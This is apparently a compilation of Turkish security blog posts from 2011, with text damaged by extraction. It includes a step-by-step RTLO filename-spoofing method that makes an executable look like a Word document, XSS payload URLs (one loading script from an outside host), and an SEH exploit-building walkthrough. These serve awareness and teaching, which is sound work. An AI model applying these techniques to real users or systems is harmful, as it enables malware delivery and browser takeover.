Windows XP işletim sistemi varsayılan (default) olarak az oumlnce bahsi geccedilen dilleri desteklememekte ek bir paket yuumlklenerek (Installfiles for complex script and right-to-left languages) destekleyebilmekteydi Ancak Windows Vista ve Windows 7 işletim sistemlerininhayatımıza girmesi ile bu durum değişti ve varsayılan olarak bu diller desteklenir hale geldi Peki bu desteğin bizimle ne ilgisi var

Yıllarca yakınımızdakiler tarafından yapılan şu şekilde uyarılara kulak kabarttık durduk Bir dosyayı ccedilalıştırmadan oumlnce uzantısınamutlaka dikkat et Uzantısı exe ise sakın ccedilalıştırma viruumls olabilir ve bu sayede yıllar iccedilinde hepimiz ister istemez bir dosyayı

15

ccedilalıştırmadan oumlnce uzantısına dikkat eder olduk Ccediloğu kimse farkında olmasa da bu kontrol sayesinde art niyetli kişiler zararlı yazılımlarısistemlere bulaştırabilmek iccedilin daha farklı sosyal muumlhendislik youmlntemlerine başvurmak zorunda kaldılar Bu youmlntemlerden biri de RTLOevrensel kod karakterli dosya adlarına sahip zararlı yazılımlar oluşturmak oldu Peki bu dosya adlarını nasıl oluşturuyorlar da kullanıcılarıkolaylıkla kandırabiliyorlar

Oumlncelikle RTLO evrensel kod karakteri iccedileren dosya adını Windows 7 işletim sistemi uumlzerinde oluşturabilmek iccedilin kayıt defterinde(registry) bir kaccedil değişiklik yapmak ve daha sonra sistemi yeniden başlatmak gerekiyor

Bunun iccedilin izlenmesi gereken adımlar sırasıyla

bull Regedit komutu ccedilalıştırılır (Start -gt Arama kutucuğu -gt regedit)

bull HKEY_CURRENT_USERControl PanelInput Method altında EnableHexNumpad anahtarı oluşturulur ve anahtara 1 değeriatanır

bull Sistem yeniden başlatılır

Ardından exe olan program uzantısının istenilen başka bir uzantıymış gibi goumlruumlnmesi iccedilin RTLO evrensel kod karakterini dosya adındakullanıyorlar Daha net olması adına ufak bir oumlrnek uumlzerinden ilerleyelim

bull Windowssystem32 klasoumlruuml altında yer alan calcexe programını dilediğiniz bir klasoumlre kopyalayın

bull Programın uzantısının doc olarak goumlruumlnmesini sağlayacağımız iccedilin programın simgesini (icon) Microsoft Word simgesi olarakdeğiştirin (Resource Hacker programı işinizi goumlrecektir)

bull Daha sonra programın adını (rename) codexe olarak değiştirin

bull Ardından programın adını tekrar değiştirmek iccedilin programın uumlzerine farenin sağ tuşu ile basıp menuumlden yeniden adlandır (rename)oumlğesini seccedilin

bull İmleci c harfinin başına (en sol) getirin ve ardından klavyeden NUMLOCK accedilık iken ALT ve FN tuşlarına basılı tutarak +202Etuşlarına basın

Goumlrduumlğuumlnuumlz uumlzere programın uzantısı artık doc olarak goumlzuumlkuumlyor Komut satırından programın bulunduğu klasoumlrde DIR komutunuccedilalıştıracak olursanız bu yanılgının goumlruumlntuumlden ibaret olduğunu hemen anlayabilirsiniz

16

Python ile yukarıda bahsetmiş olduğum adımları (simge değiştirme hariccedil) otomatize eden RTLOpy isimli programa buradanulaşabilirsiniz

Programın kullanımı python rtlopy [extension] [source filename] [new filename]Oumlrnek kullanım python rtlopy doc calcexe Confidential_document_no_

Sonuccedil olarak Windows Vista veya Windows 7 kullanıcısıysanız ve eskiden kalma uzantı kontroluuml yaparak programları goumlzuuml kapalıccedilalıştırma alışkanlığınız varsa yakın zamanda sıkıntı yaşama ihtimaline karşı programları ccedilalıştırmadan oumlnce iccedilinde bulunduğu klasoumlrdeyer alan TYPE (Application ise dikkat) kolonuna veya HEX Editoumlr ile başlık bilgisine (ilk 2 bayt MZ ise dikkat) dikkat etmeniz faydalıolacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Zararlı Yazılım Analisti OlmakhellipSource httpswwwmertsaricacomzararli-yazilim-analisti-olmakBy MS on October 5th 2011

Son yıllarda Windows işletim sistemini hedef alan Zeus SpyEye TDL gibi hatrı sayılır zararlı yazılımlara manşetlerde sıkccedila rastlıyordukDaha sonra o ccedilok guumlvenli Mac OS X işletim sisteminin kullanım oranının artış goumlstermesi ile (bunun en buumlyuumlk nedenlerinden biri de MacOS Xe zararlı yazılım bulaşmaz yanılgısı olsa gerek) bu sisteme youmlnelik geliştirilen zararlı yazılımlar da manşetlerde yerini birer bireralmaya başladı Guumln geldi tweet atmaktan internette soumlrf yapmaya e-posta okumaktan bankacılık işlemleri gerccedilekleştirmeye kadar birccedilok alanda ihtiyaccedillarımızı karşılayabilen modern işletim sistemleri ile guumlccedillendirilmiş olan akıllı mobil cihazlar iccedilin geliştirilen zararlıyazılımlar manşetleri suumlslemeye başladı Peki bilgi hırsızlığı iccedilin geliştirilen zararlı yazılımlar neden bu kadar revaccedilta

17

Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

